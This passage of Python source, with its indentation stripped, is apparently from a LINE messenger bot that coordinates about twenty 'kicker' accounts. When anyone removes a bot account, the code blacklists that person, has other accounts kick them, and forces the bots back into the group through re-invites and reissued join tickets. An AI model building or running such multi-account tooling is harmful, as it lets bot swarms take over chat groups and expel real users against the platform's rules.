kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
pass
return
if Hmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
pass
return
if Imid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
pass
return
if ga1 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
pass
return
if ga2 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
pass
return
if ga3 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
pass
return
if ga4 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker18.kickoutFromGroup(op.param1,[op.param2])
